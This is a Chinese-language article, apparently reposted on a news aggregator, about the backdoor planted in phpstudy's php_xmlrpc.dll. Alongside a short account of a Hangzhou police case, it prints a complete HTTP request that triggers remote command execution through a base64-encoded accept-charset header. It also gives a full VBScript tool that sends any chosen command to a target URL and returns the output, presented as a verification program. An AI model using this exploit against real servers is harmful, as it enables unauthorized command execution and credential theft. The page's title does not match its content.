tft每日頭條

 > 生活

 > phpstudy創建的網站無法訪問

phpstudy創建的網站無法訪問

生活 更新时间:2024-09-01 02:23:10

前幾天杭州公安發布了關于“杭州警方通報打擊涉網違法犯罪暨“淨網2019”專項行動戰果”,其中提到的一起案件,phpstudy在2016年時就被犯罪分子植入了後門。

phpstudy創建的網站無法訪問(Phpstudy後門程序的驗證程序)1

Phpstudy軟件是國内的一款免費的PHP調試環境的程序集成包,通過集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款軟件一次性安裝,無需配置即可直接安裝使用,具有PHP環境調試和PHP開發功能,在國内有着近百萬PHP語言學習者、開發者用戶。 正是這樣一款公益性軟件,2018年12月4日,西湖區公安分局網警大隊接報案稱,某公司發現公司内有20餘台計算機被執行危險命令,疑似遠程控制抓取賬号密碼等計算機數據回傳大量敏感信息。

犯罪分子主要是在php_xmlrpc.dll放入了惡意代碼,可以利用它執行rce及反連等操作。

如果向其使用phpstudy的服務器發送發下格式數據包,就可以執行命令:

GET / HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Connection: close accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 Accept-Encoding: gzip,deflate Upgrade-Insecure-Requests: 1

上邊代碼塊中的ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7是echo system("net user");的base64編碼。

phpstudy創建的網站無法訪問(Phpstudy後門程序的驗證程序)2

我寫了一個驗證的vbs小程序,代碼如下:

if (lcase(right(wscript.fullname,11))="wscript.exe") then wscript.echo "Execute it under the cmd.exe Plz! Thx." wscript.quit end If if wscript.arguments.count<1 Then wscript.echo "use: cscript "&wscript.scriptfullname&" http://xxxx/phpstudy/" wscript.quit end If payload="echo 1111;system('"&wscript.arguments(1)&"');echo 1111;" 'wsh.echo base64encode(payload) Set Retrieva = CreateObject("Msxml2.ServerXMLHTTP") Retrieva.Open "Get", wscript.arguments(0), False Retrieva.SetRequestHeader "accept-charset", base64encode(payload) Retrieva.SetRequestHeader "Accept-Encoding", "gzip,deflate" Retrieva.Send result=Split(Retrieva.ResponseTEXT,"1111") wsh.echo result(1) function base64encode(pstext) dim oxml, ostream, onode set oxml =createobject("msxml2.domdocument") set ostream =createobject("adodb.stream") set onode =oxml.createelement("tmpnode") onode.datatype ="bin.base64" ostream.charset ="gb2312" ostream.type =2'0=adstateclosed 1=adstateopen if ostream.state =0 then ostream.open() ostream.writetext(pstext) ostream.position =0 ostream.type =1'1=adtypebinary 2=adtypetext onode.nodetypedvalue =ostream.read(-1)'-1=adreadall ostream.close() base64encode =onode.text set onode =nothing set ostream =nothing set oxml =nothing end Function

效果圖如下:

phpstudy創建的網站無法訪問(Phpstudy後門程序的驗證程序)3

,

更多精彩资讯请关注tft每日頭條,我们将持续为您更新最新资讯!
查看全部
上一页 下一页
shinee珉豪ke...
演員侯勇現任妻子是誰

相关生活资讯推荐

热门生活资讯推荐

网友关注

關于
條款和條件 隱私政策 Cookie 設置
服務
登陸 注冊 聯系我們
tft每日頭條 美食 生活 職場 母嬰 時尚 科技 汽車
友情鏈接
zpostcode Recruit weather mreligion Yellowpages sport constellation shopping name game directory literature Word tour furnish Lottery tftnews lyrics News digital car dir Edu Finance
Copyright 2023-2024 - www.tftnews.com All Rights Reserved